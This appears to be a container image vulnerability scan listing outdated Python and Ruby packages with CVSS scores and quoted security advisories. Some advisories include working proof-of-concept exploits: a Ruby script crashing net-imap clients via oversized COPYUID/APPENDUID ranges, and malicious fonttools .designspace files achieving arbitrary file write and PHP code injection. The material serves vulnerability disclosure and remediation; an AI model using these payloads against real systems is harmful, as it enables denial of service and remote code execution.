pillow 10.2.0 (pypi) pkg:pypi/pillow@10.2.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') Affected range <10.3.0 Fixed version 10.3.0 CVSS Score 7.3 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.284% EPSS Percentile 51st percentile Description In _imagingcms.c in Pillow before 10.3.0, a buffer overflow exists because strcpy is used instead of strncpy.

jinja2 3.1.2 (pypi) pkg:pypi/jinja2@3.1.2 # Dockerfile (117:120) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/home/user/.cache/pip,sharing=shared,id=cache-pip \ Tools/environment_install/install-prereqs-ubuntu.sh -y Improper Neutralization of Special Elements Used in a Template Engine Affected range <=3.1.5 Fixed version 3.1.6 CVSS Score 5.4 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.214% EPSS Percentile 44th percentile Description An oversight in how the Jinja sandboxed environment interacts with the |attr filter allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to use the |attr filter to get a reference to a string's plain format method, bypassing the sandbox. After the fix, the |attr filter no longer bypasses the environment's attribute lookup. Protection Mechanism Failure Affected range <=3.1.4 Fixed version 3.1.5 CVSS Score 5.4 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.336% EPSS Percentile 56th percentile Description An oversight in how the Jinja sandboxed environment detects calls to str.format allows an attacker that controls the content of a template to execute arbitrary Python code. To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates. Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to store a reference to a malicious string's format method, then pass that to a filter that calls it. No such filters are built-in to Jinja, but could be present through custom filters in an application. After the fix, such indirect calls are also handled by the sandbox. Improper Neutralization of Escape, Meta, or Control Sequences Affected range >=3.0.0 <=3.1.4 Fixed version 3.1.5 CVSS Score 5.4 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N EPSS Score 0.459% EPSS Percentile 64th percentile Description A bug in the Jinja compiler allows an attacker that controls both the content and filename of a template to execute arbitrary Python code, regardless of if Jinja's sandbox is used. To exploit the vulnerability, an attacker needs to control both the filename and the contents of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates where the template author can also choose the template filename. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <3.1.4 Fixed version 3.1.4 CVSS Score 5.4 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N EPSS Score 1.057% EPSS Percentile 77th percentile Description The xmlattr filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, /, >, or =, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the xmlattr filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting values as user input continues to be safe. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Affected range <3.1.3 Fixed version 3.1.3 CVSS Score 5.4 CVSS Vector CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N EPSS Score 0.151% EPSS Percentile 36th percentile Description The xmlattr filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the xmlattr filter, and an application doing so should already be verifying what keys are provided regardless of this fix.

cgi 0.3.6 (gem) pkg:gem/cgi@0.3.6 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Inefficient Regular Expression Complexity Affected range =0.3.6 Fixed version 0.3.7 CVSS Score 6.3 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.566% EPSS Percentile 68th percentile Description There is a possibility for Regular expression Denial of Service (ReDoS) by in the cgi gem. This vulnerability has been assigned the CVE identifier CVE-2025-27220. We recommend upgrading the cgi gem. Details The regular expression used in CGI::Util#escapeElement is vulnerable to ReDoS. The crafted input could lead to a high CPU consumption. This vulnerability only affects Ruby 3.1 and 3.2. If you are using these versions, please update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later. Affected versions cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1. Credits Thanks to svalkanov for discovering this issue. Also thanks to nobu for fixing this vulnerability. Uncontrolled Resource Consumption Affected range =0.3.6 Fixed version 0.3.7 CVSS Score 6.3 CVSS Vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N EPSS Score 0.778% EPSS Percentile 73rd percentile Description There is a possibility for DoS by in the cgi gem. This vulnerability has been assigned the CVE identifier CVE-2025-27219. We recommend upgrading the cgi gem. Details CGI::Cookie.parse took super-linear time to parse a cookie string in some cases. Feeding a maliciously crafted cookie string into the method could lead to a Denial of Service. Please update CGI gem to version 0.3.5.1, 0.3.7, 0.4.2 or later. Affected versions cgi gem versions <= 0.3.5, 0.3.6, 0.4.0 and 0.4.1. Credits Thanks to lio346 for discovering this issue. Also thanks to mame for fixing this vulnerability.

net-imap 0.3.4.1 (gem) pkg:gem/net-imap@0.3.4.1 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Uncontrolled Resource Consumption Affected range >=0.3.0 <=0.3.8 Fixed version 0.3.9 CVSS Score 6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.528% EPSS Percentile 67th percentile Description Summary There is a possibility for denial of service by memory exhaustion when net-imap reads server responses. At any time while the client is connected, a malicious server can send can send a "literal" byte count, which is automatically read by the client's receiver thread. The response reader immediately allocates memory for the number of bytes indicated by the server response. This should not be an issue when securely connecting to trusted IMAP servers that are well-behaved. It can affect insecure connections and buggy, untrusted, or compromised servers (for example, connecting to a user supplied hostname). Details The IMAP protocol allows "literal" strings to be sent in responses, prefixed with their size in curly braces (e.g. {1234567890}\r\n). When Net::IMAP receives a response containing a literal string, it calls IO#read with that size. When called with a size, IO#read immediately allocates memory to buffer the entire string before processing continues. The server does not need to send any more data. There is no limit on the size of literals that will be accepted. Fix Upgrade Users should upgrade to net-imap 0.5.7 or later. A configurable max_response_size limit has been added to Net::IMAP's response reader. The max_response_size limit has also been backported to net-imap 0.2.5, 0.3.9, and 0.4.20. To set a global value for max_response_size, users must upgrade to net-imap ~> 0.4.20, or > 0.5.7. Configuration To avoid backward compatibility issues for secure connections to trusted well-behaved servers, the default max_response_size for net-imap 0.5.7 is very high (512MiB), and the default max_response_size for net-imap ~> 0.4.20, ~> 0.3.9, and 0.2.5 is nil (unlimited). When connecting to untrusted servers or using insecure connections, a much lower max_response_size should be used. # Set the global max_response_size (only ~> v0.4.20, > 0.5.7) Net::IMAP.config.max_response_size = 256 << 10 # 256 KiB # Set when creating the connection imap = Net::IMAP.new(hostname, ssl: true, max_response_size: 16 << 10) # 16 KiB # Set after creating the connection imap.max_response_size = 256 << 20 # 256 KiB # flush currently waiting read, to ensure the new setting is loaded imap.noop Please Note: max_response_size only limits the size per response. It does not prevent a flood of individual responses and it does not limit how many unhandled responses may be stored on the responses hash. Users are responsible for adding response handlers to prune excessive unhandled responses. Compatibility with lower max_response_size A lower max_response_size may cause a few commands which legitimately return very large responses to raise an exception and close the connection. The max_response_size could be temporarily set to a higher value, but paginated or limited versions of commands should be used whenever possible. For example, to fetch message bodies: imap.max_response_size = 256 << 20 # 256 KiB imap.noop # flush currently waiting read # fetch a message in 252KiB chunks size = imap.uid_fetch(uid, "RFC822.SIZE").first.rfc822_size limit = 252 << 10 message = ((0..size) % limit).each_with_object("") {|offset, str| str << imap.uid_fetch(uid, "BODY.PEEK[]<#{offset}.#{limit}>").first.message(offset:) } imap.max_response_size = 16 << 20 # 16 KiB imap.noop # flush currently waiting read References PR to introduce max_response_size: ✨ Limit max_response_size ruby/net-imap#444 Specific commit: 0ae8576c1 - lib/net/imap/response_reader.rb Backport to 0.4: ✨ Limit max_response_size (backport 0.4) ruby/net-imap#445 Backport to 0.3: ✨ Limit max_response_size (backport 0.3) ruby/net-imap#446 Backport to 0.2: ✨ Limit max_response_size (backport 0.2) ruby/net-imap#447 Improper Validation of Specified Type of Input Affected range >=0.3.2 <0.3.8 Fixed version 0.3.8 CVSS Score 6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.247% EPSS Percentile 48th percentile Description Summary There is a possibility for denial of service by memory exhaustion in net-imap's response parser. At any time while the client is connected, a malicious server can send can send highly compressed uid-set data which is automatically read by the client's receiver thread. The response parser uses Range#to_a to convert the uid-set data into arrays of integers, with no limitation on the expanded size of the ranges. Details IMAP's uid-set and sequence-set formats can compress ranges of numbers, for example: "1,2,3,4,5" and "1:5" both represent the same set. When Net::IMAP::ResponseParser receives APPENDUID or COPYUID response codes, it expands each uid-set into an array of integers. On a 64 bit system, these arrays will expand to 8 bytes for each number in the set. A malicious IMAP server may send specially crafted APPENDUID or COPYUID responses with very large uid-set ranges. The Net::IMAP client parses each server response in a separate thread, as soon as each responses is received from the server. This attack works even when the client does not handle the APPENDUID or COPYUID responses. Malicious inputs: # 40 bytes expands to ~1.6GB: "* OK [COPYUID 1 1:99999999 1:99999999]\r\n" # Worst *valid* input scenario (using uint32 max), # 44 bytes expands to 64GiB: "* OK [COPYUID 1 1:4294967295 1:4294967295]\r\n" # Numbers must be non-zero uint32, but this isn't validated. Arrays larger than # UINT32_MAX can be created. For example, the following would theoretically # expand to almost 800 exabytes: "* OK [COPYUID 1 1:99999999999999999999 1:99999999999999999999]\r\n" Simple way to test this: require "net/imap" def test(size) input = "A004 OK [COPYUID 1 1:#{size} 1:#{size}] too large?\r\n" parser = Net::IMAP::ResponseParser.new parser.parse input end test(99_999_999) Fixes Preferred Fix, minor API changes Upgrade to v0.4.19, v0.5.6, or higher, and configure: # globally Net::IMAP.config.parser_use_deprecated_uidplus_data = false # per-client imap = Net::IMAP.new(hostname, ssl: true, parser_use_deprecated_uidplus_data: false) imap.config.parser_use_deprecated_uidplus_data = false This replaces UIDPlusData with AppendUIDData and CopyUIDData. These classes store their UIDs as Net::IMAP::SequenceSet objects (not expanded into arrays of integers). Code that does not handle APPENDUID or COPYUID responses will not notice any difference. Code that does handle these responses may need to be updated. See the documentation for UIDPlusData, AppendUIDData and CopyUIDData. For v0.3.8, this option is not available. For v0.4.19, the default value is true. For v0.5.6, the default value is :up_to_max_size. For v0.6.0, the only allowed value will be false (UIDPlusData will be removed from v0.6). Mitigation, backward compatible API Upgrade to v0.3.8, v0.4.19, v0.5.6, or higher. For backward compatibility, uid-set can still be expanded into an array, but a maximum limit will be applied. Assign config.parser_max_deprecated_uidplus_data_size to set the maximum UIDPlusData UID set size. When config.parser_use_deprecated_uidplus_data == true, larger sets will raise Net::IMAP::ResponseParseError. When config.parser_use_deprecated_uidplus_data == :up_to_max_size, larger sets will use AppendUIDData or CopyUIDData. For v0.3,8, this limit is hard-coded to 10,000, and larger sets will always raise Net::IMAP::ResponseParseError. For v0.4.19, the limit defaults to 1000. For v0.5.6, the limit defaults to 100. For v0.6.0, the limit will be ignored (UIDPlusData will be removed from v0.6). Please Note: unhandled responses If the client does not add response handlers to prune unhandled responses, a malicious server can still eventually exhaust all client memory, by repeatedly sending malicious responses. However, net-imap has always retained unhandled responses, and it has always been necessary for long-lived connections to prune these responses. This is not significantly different from connecting to a trusted server with a long-lived connection. To limit the maximum number of retained responses, a simple handler might look something like the following: limit = 1000 imap.add_response_handler do |resp| next unless resp.respond_to?(:name) && resp.respond_to?(:data) name = resp.name code = resp.data.code&.name if resp.data.respond_to?(:code) if Net::IMAP::VERSION > "0.4.0" imap.responses(name) { _1.slice!(0...-limit) } imap.responses(code) { _1.slice!(0...-limit) } else imap.responses(name).slice!(0...-limit) imap.responses(code).slice!(0...-limit) end end Proof of concept Save the following to a ruby file (e.g: poc.rb) and make it executable: #!/usr/bin/env ruby require 'socket' require 'net/imap' if !defined?(Net::IMAP.config) puts "Net::IMAP.config is not available" elsif !Net::IMAP.config.respond_to?(:parser_use_deprecated_uidplus_data) puts "Net::IMAP.config.parser_use_deprecated_uidplus_data is not available" else Net::IMAP.config.parser_use_deprecated_uidplus_data = :up_to_max_size puts "Updated parser_use_deprecated_uidplus_data to :up_to_max_size" end size = Integer(ENV["UID_SET_SIZE"] || 2**32-1) def server_addr Addrinfo.tcp("localhost", 0).ip_address end def create_tcp_server TCPServer.new(server_addr, 0) end def start_server th = Thread.new do yield end sleep 0.1 until th.stop? end def copyuid_response(tag: "*", size: 2**32-1, text: "too large?") "#{tag} OK [COPYUID 1 1:#{size} 1:#{size}] #{text}\r\n" end def appenduid_response(tag: "*", size: 2**32-1, text: "too large?") "#{tag} OK [APPENDUID 1 1:#{size}] #{text}\r\n" end server = create_tcp_server port = server.addr[1] puts "Server started on port #{port}" # server start_server do sock = server.accept begin sock.print "* OK test server\r\n" cmd = sock.gets("\r\n", chomp: true) tag = cmd.match(/\A(\w+) /)[1] puts "Received: #{cmd}" malicious_response = appenduid_response(size:) puts "Sending: #{malicious_response.chomp}" sock.print malicious_response malicious_response = copyuid_response(size:) puts "Sending: #{malicious_response.chomp}" sock.print malicious_response sock.print "* CAPABILITY JUMBO=UIDPLUS PROOF_OF_CONCEPT\r\n" sock.print "#{tag} OK CAPABILITY completed\r\n" cmd = sock.gets("\r\n", chomp: true) tag = cmd.match(/\A(\w+) /)[1] puts "Received: #{cmd}" sock.print "* BYE If you made it this far, you passed the test!\r\n" sock.print "#{tag} OK LOGOUT completed\r\n" rescue Exception => ex puts "Error in server: #{ex.message} (#{ex.class})" ensure sock.close server.close end end # client begin puts "Client connecting,.." imap = Net::IMAP.new(server_addr, port: port) puts "Received capabilities: #{imap.capability}" pp responses: imap.responses imap.logout rescue Exception => ex puts "Error in client: #{ex.message} (#{ex.class})" puts ex.full_message ensure imap.disconnect if imap end Use ulimit to limit the process's virtual memory. The following example limits virtual memory to 1GB: $ ( ulimit -v 1000000 && exec ./poc.rb ) Server started on port 34291 Client connecting,.. Received: RUBY0001 CAPABILITY Sending: * OK [APPENDUID 1 1:4294967295] too large? Sending: * OK [COPYUID 1 1:4294967295 1:4294967295] too large? Error in server: Connection reset by peer @ io_fillbuf - fd:9 (Errno::ECONNRESET) Error in client: failed to allocate memory (NoMemoryError) /gems/net-imap-0.5.5/lib/net/imap.rb:3271:in 'Net::IMAP#get_tagged_response': failed to allocate memory (NoMemoryError) from /gems/net-imap-0.5.5/lib/net/imap.rb:3371:in 'block in Net::IMAP#send_command' from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize' from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize' from /gems/net-imap-0.5.5/lib/net/imap.rb:3353:in 'Net::IMAP#send_command' from /gems/net-imap-0.5.5/lib/net/imap.rb:1128:in 'block in Net::IMAP#capability' from /rubylibdir/monitor.rb:201:in 'Monitor#synchronize' from /rubylibdir/monitor.rb:201:in 'MonitorMixin#mon_synchronize' from /gems/net-imap-0.5.5/lib/net/imap.rb:1127:in 'Net::IMAP#capability' from /workspace/poc.rb:70:in '<main>'

pip 24.0 (pypi) pkg:pypi/pip@24.0 # Dockerfile (128:130) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ sudo apt-get update && sudo apt --no-install-recommends install -y python3-pip Improper Link Resolution Before File Access ('Link Following') Affected range <=25.2 Fixed version 25.3 CVSS Score 5.9 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N EPSS Score 0.017% EPSS Percentile 4th percentile Description When extracting a tar archive pip may not check symbolic links point into the extraction directory if the tarfile module doesn't implement PEP 706. Note that upgrading pip to a "fixed" version for this vulnerability doesn't fix all known vulnerabilities that are remediated by using a Python version that implements PEP 706. Note that this is a vulnerability in pip's fallback implementation of tar extraction for Python versions that don't implement PEP 706 and therefore are not secure to all vulnerabilities in the Python 'tarfile' module. If you're using a Python version that implements PEP 706 then pip doesn't use the "vulnerable" fallback code. Mitigations include upgrading to a version of pip that includes the fix, upgrading to a Python version that implements PEP 706 (Python >=3.9.17, >=3.10.12, >=3.11.4, or >=3.12), applying the linked patch, or inspecting source distributions (sdists) before installation as is already a best-practice. Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Affected range <26.0 Fixed version 26.0 CVSS Score 2 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N EPSS Score 0.019% EPSS Percentile 5th percentile Description When pip is installing and extracting a maliciously crafted wheel archive, files may be extracted outside the installation directory. The path traversal is limited to prefixes of the installation directory, thus isn't able to inject or overwrite executable files in typical situations.

fonttools 4.46.0 (pypi) pkg:pypi/fonttools@4.46.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop XML Injection (aka Blind XPath Injection) Affected range >=4.33.0 <4.60.2 Fixed version 4.60.2 CVSS Score 6.3 CVSS Vector CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:N/I:H/A:L EPSS Score 0.264% EPSS Percentile 50th percentile Description Summary The fonttools varLib (or python3 -m fontTools.varLib) script has an arbitrary file write vulnerability that leads to remote code execution when a malicious .designspace file is processed. The vulnerability affects the main() code path of fontTools.varLib, used by the fonttools varLib CLI and any code that invokes fontTools.varLib.main(). The vulnerability exists due to unsanitised filename handling combined with content injection. Attackers can write files to arbitrary filesystem locations via path traversal sequences, and inject malicious code (like PHP) into the output files through XML injection in labelname elements. When these files are placed in web-accessible locations and executed, this achieves remote code execution without requiring any elevated privileges. Once RCE is obtained, attackers can further escalate privileges to compromise system files (like overwriting /etc/passwd). Overall this allows attackers to: Write font files to arbitrary locations on the filesystem Overwrite configuration files Corrupt application files and dependencies Obtain remote code execution The attacker controls the file location, extension and contents which could lead to remote code execution as well as enabling a denial of service through file corruption means. Affected Lines fontTools/varLib/__init__.py filename = vf.filename # Unsanitised filename output_path = os.path.join(output_dir, filename) # Path traversal vf.save(output_path) # Arbitrary file write PoC Set up malicious.designspace and respective source-*.ttf files in a directory like /Users/<username>/testing/demo/ (will impact relative file location within malicious.designspace) setup.py #!/usr/bin/env python3 import os from fontTools.fontBuilder import FontBuilder from fontTools.pens.ttGlyphPen import TTGlyphPen def create_source_font(filename, weight=400): fb = FontBuilder(unitsPerEm=1000, isTTF=True) fb.setupGlyphOrder([".notdef"]) fb.setupCharacterMap({}) pen = TTGlyphPen(None) pen.moveTo((0, 0)) pen.lineTo((500, 0)) pen.lineTo((500, 500)) pen.lineTo((0, 500)) pen.closePath() fb.setupGlyf({".notdef": pen.glyph()}) fb.setupHorizontalMetrics({".notdef": (500, 0)}) fb.setupHorizontalHeader(ascent=800, descent=-200) fb.setupOS2(usWeightClass=weight) fb.setupPost() fb.setupNameTable({"familyName": "Test", "styleName": f"Weight{weight}"}) fb.save(filename) if __name__ == '__main__': os.chdir(os.path.dirname(os.path.abspath(__file__))) create_source_font("source-light.ttf", weight=100) create_source_font("source-regular.ttf", weight=400) malicious.designspace <?xml version='1.0' encoding='UTF-8'?> <designspace format="5.0"> <axes> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/> </axes> <sources> <source filename="source-light.ttf" name="Light"> <location> <dimension name="Weight" xvalue="100"/> </location> </source> <source filename="source-regular.ttf" name="Regular"> <location> <dimension name="Weight" xvalue="400"/> </location> </source> </sources> <!-- Filename can be arbitrarily set to any path on the filesystem --> <variable-fonts> <variable-font name="MaliciousFont" filename="../../tmp/newarbitraryfile.json"> <axis-subsets> <axis-subset name="Weight"/> </axis-subsets> </variable-font> </variable-fonts> </designspace> Optional: You can put a file with any material within ../../tmp/newarbitraryfile.json in advance, the contents in the file will be overwritten after running the setup script in the following step. Run the setup.py script to generate source-*.tff files required for the malicious.designspace file. python3 setup.py Execute the given payload using the vulnerable varLib saving the file into the arbitrary file location of filename fonttools varLib malicious.designspace Validate arbitrary file write was performed by looking at path assigned within malicious designspace cat {{filename_location}} After validating that we can provide arbitrary write to any location, we can also validate that we can control sections of content as well demonstrated with the below payload. malicious2.designspace <?xml version='1.0' encoding='UTF-8'?> <designspace format="5.0"> <axes> <!-- XML injection occurs in labelname elements with CDATA sections --> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"> <labelname xml:lang="en"><![CDATA[<?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]]]><![CDATA[>]]></labelname> <labelname xml:lang="fr">MEOW2</labelname> </axis> </axes> <axis tag="wght" name="Weight" minimum="100" maximum="900" default="400"/> <sources> <source filename="source-light.ttf" name="Light"> <location> <dimension name="Weight" xvalue="100"/> </location> </source> <source filename="source-regular.ttf" name="Regular"> <location> <dimension name="Weight" xvalue="400"/> </location> </source> </sources> <variable-fonts> <variable-font name="MyFont" filename="output.ttf"> <axis-subsets> <axis-subset name="Weight"/> </axis-subsets> </variable-font> </variable-fonts> <instances> <instance name="Display Thin" familyname="MyFont" stylename="Thin"> <location><dimension name="Weight" xvalue="100"/></location> <labelname xml:lang="en">Display Thin</labelname> </instance> </instances> </designspace> When the program is run, we can show we control the contents in the new file fonttools varLib malicious2.designspace -o file123 Here being outputted to a localised area ignoring filename presented in variable-font We can look inside file123 to validate user controlled injection cat file123 to show <?php echo shell_exec("/usr/bin/touch /tmp/MEOW123");?>]]> Executing the file and reading looking at the newly generated file php file123 ls -la /tmp/MEOW123 we can see that the file was just created showing RCE. Recommendations Ensure output file paths configured within designspace files are restricted to the local directory or consider further security measures to prevent arbitrary file write/overwrite within any directory on the system

resolv 0.2.2 (gem) pkg:gem/resolv@0.2.2 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Improper Validation of Specified Quantity in Input Affected range <0.2.3 Fixed version 0.2.3 CVSS Score 6.6 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U EPSS Score 0.046% EPSS Percentile 14th percentile Description A denial of service vulnerability has been discovered in the resolv gem bundled with Ruby. Details The vulnerability is caused by an insufficient check on the length of a decompressed domain name within a DNS packet. An attacker can craft a malicious DNS packet containing a highly compressed domain name. When the resolv library parses such a packet, the name decompression process consumes a large amount of CPU resources, as the library does not limit the resulting length of the name. This resource consumption can cause the application thread to become unresponsive, resulting in a Denial of Service condition. Affected Version The vulnerability affects the resolv gem bundled with the following Ruby series: Ruby 3.2 series: resolv version 0.2.2 and earlier Ruby 3.3 series: resolv version 0.3.0 Ruby 3.4 series: resolv version 0.6.1 and earlier Credits Thanks to Manu for discovering this issue. History Originally published at 2025-07-08 07:00:00 (UTC)

zipp 1.0.0 (pypi) pkg:pypi/zipp@1.0.0 # Dockerfile (64:66) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y ros-jazzy-desktop Uncontrolled Resource Consumption Affected range <3.19.1 Fixed version 3.19.1 CVSS Score 6.9 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N EPSS Score 0.016% EPSS Percentile 3rd percentile Description A Denial of Service (DoS) vulnerability exists in the jaraco/zipp library, affecting all versions prior to 3.19.1. The vulnerability is triggered when processing a specially crafted zip file that leads to an infinite loop. This issue also impacts the zipfile module of CPython, as features from the third-party zipp library are later merged into CPython, and the affected code is identical in both projects. The infinite loop can be initiated through the use of functions affecting the Path module in both zipp and zipfile, such as joinpath, the overloaded division operator, and iterdir. Although the infinite loop is not resource exhaustive, it prevents the application from responding. The vulnerability was addressed in version 3.19.1 of jaraco/zipp.

uri 0.12.2 (gem) pkg:gem/uri@0.12.2 # Dockerfile (82:84) RUN --mount=type=cache,target=/var/cache/apt,sharing=locked,id=cache-apt-$TARGETARCH-$TARGETVARIANT \ --mount=type=cache,target=/var/lib/apt,sharing=locked,id=lib-apt-$TARGETARCH-$TARGETVARIANT \ apt-get update && apt --no-install-recommends install -y cppzmq-dev gz-harmonic && apt-mark auto cppzmq-dev Improper Removal of Sensitive Information Before Storage or Transfer Affected range <0.12.5 Fixed version 0.12.5 CVSS Score 2.7 CVSS Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U EPSS Score 0.018% EPSS Percentile 4th percentile Description Impact In affected URI version, a bypass exists for the fix to CVE-2025-27221 that can expose user credentials. When using the + operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure. The vulnerability affects the uri gem bundled with the following Ruby series: 0.12.4 and earlier (bundled in Ruby 3.2 series) 0.13.2 and earlier (bundled in Ruby 3.3 series) 1.0.3 and earlier (bundled in Ruby 3.4 series) Patches Upgrade to 0.12.5, 0.13.3 or 1.0.4 References https://www.ruby-lang.org/en/news/2025/02/26/security-advisories/ https://hackerone.com/reports/2957667 Exposure of Sensitive Information to an Unauthorized Actor Affected range >=0.12.0 <0.12.4 Fixed version 0.12.4 CVSS Score 2.1 CVSS Vector CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N EPSS Score 0.038% EPSS Percentile 11th percentile Description There is a possibility for userinfo leakage by in the uri gem. This vulnerability has been assigned the CVE identifier CVE-2025-27221. We recommend upgrading the uri gem. Details The methods URI#join, URI#merge, and URI#+ retained userinfo, such as user:password, even after the host is replaced. When generating a URL to a malicious host from a URL containing secret userinfo using these methods, and having someone access that URL, an unintended userinfo leak could occur. Please update URI gem to version 0.11.3, 0.12.4, 0.13.2, 1.0.3 or later. Affected versions uri gem versions < 0.11.3, 0.12.0 to 0.12.3, 0.13.0, 0.13.1 and 1.0.0 to 1.0.2. Credits Thanks to Tsubasa Irisawa (lambdasawa) for discovering this issue. Also thanks to nobu for additional fixes of this vulnerability.

